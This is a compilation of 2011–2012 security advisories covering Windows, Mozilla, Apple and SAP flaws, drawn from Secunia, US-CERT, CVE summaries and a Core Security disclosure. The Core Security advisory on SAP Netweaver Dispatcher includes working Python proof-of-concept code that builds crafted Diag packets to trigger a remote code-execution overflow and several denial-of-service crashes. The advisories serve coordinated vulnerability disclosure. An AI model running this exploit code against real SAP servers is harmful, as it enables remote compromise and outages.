https://ca.secunia.com/?page=viewadvisory&vuln_id=47237 RELEASE DATE: 2011-12-19 DISCUSS ADVISORY: http://secunia.com/advisories/47237/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/47237/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=47237 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large "height" attribute viewed using the Apple Safari browser. The vulnerability is confirmed on a fully patched Windows 7 Professional 64-bit. Other versions may also be affected. SOLUTION: No effective solution is currently available. PROVIDED AND/OR DISCOVERED BY: webDEViL ORIGINAL ADVISORY: https://twitter.com/#!/w3bd3vil/status/148454992989261824 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA12-045A Microsoft Updates for Multiple Vulnerabilities Original release date: February 14, 2012 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Internet Explorer * Microsoft .NET Framework * Microsoft Silverlight * Microsoft Office * Microsoft Server Software Overview There are multiple vulnerabilities in Microsoft Windows, Internet Explorer, Microsoft .NET Framework, Silverlight, Office, and Microsoft Server Software. Microsoft has released updates to address these vulnerabilities. I. Description The Microsoft Security Bulletin Summary for February 2012 describes multiple vulnerabilities in Microsoft Windows. Microsoft has released updates to address the vulnerabilities. II. Impact A remote, unauthenticated attacker could execute arbitrary code, cause a denial of service, or gain unauthorized access to your files or system. III. Solution Apply updates Microsoft has provided updates for these vulnerabilities in the Microsoft Security Bulletin Summary for February 2012, which describes any known issues related to the updates. Administrators are encouraged to note these issues and test for any potentially adverse effects. In addition, administrators should consider using an automated update distribution system such as Windows Server Update Services (WSUS). Home users are encouraged to enable automatic updates. IV. References * Microsoft Security Bulletin Summary for February 2012 - <https://technet.microsoft.com/en-us/security/bulletin/ms12-feb> * Microsoft Windows Server Update Services - <http://technet.microsoft.com/en-us/wsus/default.aspx> * Microsoft Update - <https://www.update.microsoft.com/> * Microsoft Update Overview - <http://www.microsoft.com/security/updates/mu.aspx> * Turn Automatic Updating On or Off - <http://windows.microsoft.com/en-us/windows-vista/Turn-automatic-updating-on-or-off> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA12-045A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA12-045A Feedback VU#752838" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2012 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 14, 2012: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBTzqp2T/GkGVXE7GMAQKh6wgAg9gjZ3sCu3eepRZEyFy4PkGhC4A1jzgw 2soH7tPOimgpzlLVbkJ7/RQYylCYixzEa9PbL9v/RzXh/TVVeXrPU97SqmLOAXr7 gtgcapZBGSHBmqYF5BWRnXVRVOQv+JpmdA5AJHO89qQl4okr9VVTCTnQkrAFyzfP 40uf/Nr0DrTRI9dmEjsLTzvOhh0G2HKnBmbpybGaOqoQao67ih/HEOkp6bsCUBwK joX4C3nK9EdMPNK8YAzrHNbM0ANR5DfieGXBsCwNi6/3zZvGB+PKhAu6bikbQrXW iRpyS3IirvDB59KNlmQp3jdaodNHSLOg5JuF7kOdQ1m8qa+DjwSvJQ== =E3Fg -----END PGP SIGNATURE-----

Mozilla Firefox before 3.6.25 and Thunderbird before 3.1.17 on Mac OS X do not consider .jar files to be executable files, which allows user-assisted remote attackers to bypass intended access restrictions via a crafted file. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-2372 on Mac OS X. Mozilla Firefox and Thunderbird are prone to a remote code-execution vulnerability. An attacker could exploit this issue to execute arbitrary code in the context of the user running an affected application. Failed attempts could lead to a denial-of-service condition. Firefox is a very popular open source web browser. Thunderbird is an email client that supports IMAP, POP email protocols, and HTML email formats

Mozilla Firefox before 9.0, Thunderbird before 9.0, and SeaMonkey before 2.6 on Mac OS X do not properly handle certain DOM frame deletions by plugins, which allows remote attackers to cause a denial of service (incorrect pointer dereference and application crash) or possibly have unspecified other impact via a crafted web site. Mozilla Firefox is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue attackers may also be able to run arbitrary code, but this has not been confirmed. This issue is fixed in: Firefox 9.0 Thunderbird 9.0 SeaMonkey 2.6. Firefox is a very popular open source web browser. Thunderbird is an email client that supports IMAP, POP email protocols, and HTML email formats. SeaMonkey is an open source web browser, mail and newsgroup client, IRC session client, and HTML editor. ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Mozilla Firefox / Thunderbird Multiple Vulnerabilities SECUNIA ADVISORY ID: SA47302 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47302/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47302 RELEASE DATE: 2011-12-21 DISCUSS ADVISORY: http://secunia.com/advisories/47302/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/47302/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=47302 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Mozilla Firefox and Thunderbird, where one has an unknown impact and others can be exploited by malicious people to disclose sensitive information and compromise a user's system. 1) Some unspecified errors can be exploited to corrupt memory. No further information is currently available. 2) An error exists within the YARR regular expression library when parsing javascript content. 3) An error within the SVG implementation when SVG elements are removed during a DOMAttrModified event can be exploited to cause an out-of-bounds memory access. 4) The application does not properly handle SVG animation accessKey events when JavaScript is disabled. This can lead to the user's key strokes being leaked. 5) An error within the plugin handler when deleting DOM frame can be exploited to dereference memory. NOTE: This vulnerability only affects Mac OS X. 6) An error exists within the handling of OGG <video> elements. Successful exploitation of vulnerabilities #1 - #3 and #5 may allow execution of arbitrary code. SOLUTION: Upgrade to version 9.0. PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian Holler, David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse Ruderman, Marcia Knous, and Rober Longson 2) Aki Helin 3) regenrecht via ZDI 4) Mario Heiderich 5) Richard Bateman 6) sczimmer ORIGINAL ADVISORY: Mozilla: http://www.mozilla.org/security/announce/2011/mfsa2011-53.html http://www.mozilla.org/security/announce/2011/mfsa2011-54.html http://www.mozilla.org/security/announce/2011/mfsa2011-55.html http://www.mozilla.org/security/announce/2011/mfsa2011-56.html http://www.mozilla.org/security/announce/2011/mfsa2011-57.html http://www.mozilla.org/security/announce/2011/mfsa2011-58.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303. An attacker can exploit this issue to bypass certain security restrictions and gain access to restricted functionality. Apple Mac OS X 10.5.x, 10.6.x and 10.7.x are vulnerable; other versions may also be affected. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SAP Netweaver Dispatcher Multiple Vulnerabilities 1. *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability* [CVE-2011-1517] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability* [CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceAtoms'. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability* [CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceStreamI' and could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability* [CVE-2012-2513] The vulnerability can be triggered by the vulnerable function 'Diaginput', allowing a denial of service attack against the vulnerable systems. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability* [CVE-2012-2514] The vulnerability can be triggered by the vulnerable function 'DiagiEventSource' in the 'disp+work.exe' module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5 and Safari before 5.1.1, allows remote attackers to inject arbitrary web script or HTML via vectors involving inactive DOM windows. WebKit is prone to a cross-domain scripting vulnerability because the application fails to properly enforce the same-origin policy. Successful exploits will allow attackers to execute arbitrary script code within the context of the affected application. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. ---------------------------------------------------------------------- Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool. Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/ ---------------------------------------------------------------------- TITLE: Apple iOS Multiple Vulnerabilities SECUNIA ADVISORY ID: SA46377 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46377/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46377 RELEASE DATE: 2011-10-14 DISCUSS ADVISORY: http://secunia.com/advisories/46377/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46377/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46377 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Apple iOS, which can be exploited by malicious people with physical access to disclose certain information and by malicious people to conduct script insertion, cross-site scripting, and spoofing attacks, disclose sensitive information, bypass certain security restrictions, cause a DoS (Denial of Service), and compromise a user's device. 1) An error within the CalDAV component does not properly validate the SSL certificate when synchronizing the calendar, which can be exploited to disclose encrypted information e.g. using a Man-in-the-Middle (MitM) attack. 2) Input passed via invitation notes is not properly sanitised in Calendar before being returned to the user. 3) The CFNetwork component stores a user's AppleID password and username in the log file readable by applications, which can be exploited to disclose the credentials. 4) The CFNetwork component does not properly restrict cross-domain access of HTTP cookies, which can be exploited to access the cookies of another web site. 5) An error exists within CoreFoundation when handling string tokenization. For more information see vulnerability #1 in: SA46339 6) Multiple errors within CoreGraphics when handling the certain freetype fonts can be exploited to corrupt memory. 7) An error within CoreMedia does not properly handle cross-site redirects and can be exploited to disclose video data. 8) An error exits within the Data Access component when handling multiple accounts configured on the same server and can be exploited to disclose the cookie of another account. 9) The application accepts X.509 certificates with MD5 hashes, which could lead to weak cryptographic certificates being used. This can be exploited to disclose encrypted information e.g. using a Man-in-the-Middle (MitM) attack. 10) A design error exists within the implementation of SSL 3.0 and TLS 1.0 protocols. For more information: SA46168 11) An error within ImageIO when handling CCITT Group 4 encoded TIFF files can be exploited to cause a buffer overflow. For more information see vulnerability #1 in: SA43593 12) An error in ImageIO within the handling of CCITT Group 4 encoded TIFF image files can be exploited to cause a heap-based buffer overflow. For more information see vulnerability #9 in: SA45325 13) An error within ICU (International Components for Unicode) can be exploited to cause a buffer overflow. For more information see vulnerability #11 in: SA45054 14) An error within the kernel does not reclaim memory from incomplete TCP connections, which can be exploited to exhaust system resources by connecting to a listening service and cause the device to reset. 15) A NULL-pointer dereference error within the kernel when handling IPv6 socket options can be exploited to cause the device to reset. 16) An error within libxml can be exploited to cause a heap-based buffer overflow. For more information see vulnerability #12 in: SA45325 17) An error within OfficeImport when viewing certain Microsoft Word files can be exploited to cause a buffer overflow. 18) An error within OfficeImport when viewing certain Microsoft Excel files can be exploited to cause a buffer overflow. 19) An indexing error exists in the OfficeImport framework when processing certain records in a Microsoft Word file. For more information see vulnerability #19 in: SA45054 20) An error in the OfficeImport framework when processing records can be exploited to corrupt memory. For more information see vulnerability #28 in: SA43814 21) An error within Safari does not properly handle the "attachment" HTTP Content-Disposition header and can be exploited to conduct cross-site scripting attacks. 22) The parental restrictions feature stores the restrictions passcode in plaintext on disk and can be exploited to disclose the passcode. 23) An error within UIKit does not properly handle "tel:" URIs and can be exploited to cause the device to hang by tricking the user into visiting a malicious website. 24) Some vulnerabilities are caused due to a bundled vulnerable version of WebKit. For more information: SA43519 SA43683 SA43696 SA43859 SA45097 SA45325 SA45325 SA45498 SA45498 SA46339 SA46412 25) The WiFi credentials are stored in a file readable by other applications, which may lead to the credentials being disclosed. SOLUTION: Apply iOS 5 Software Update. PROVIDED AND/OR DISCOVERED BY: 1) Leszek Tasiemski, nSense. 6, 9) Reported by the vendor. The vendor credits: 2) Rick Deacon 3) Peter Quade, qdevelop 4) Erling Ellingsen, Facebook. 7) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR) 8) Bob Sielken, IBM 14) Wouter van der Veer, Topicus and Josh Enders 15) Thomas Clement, Intego 17) Tobias Klein via iDefense. 18) Tobias Klein, www.trapkit.de 21) Christian Matthies via iDefense and Yoshinori Oota, Business Architects via JP/CERT. 22) An anonymous person 23) Simon Young, Anglia Ruskin University 25) Laurent OUDOT, TEHTRI Security ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT4999 nSense: http://www.nsense.fi/advisories/nsense_2011_006.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------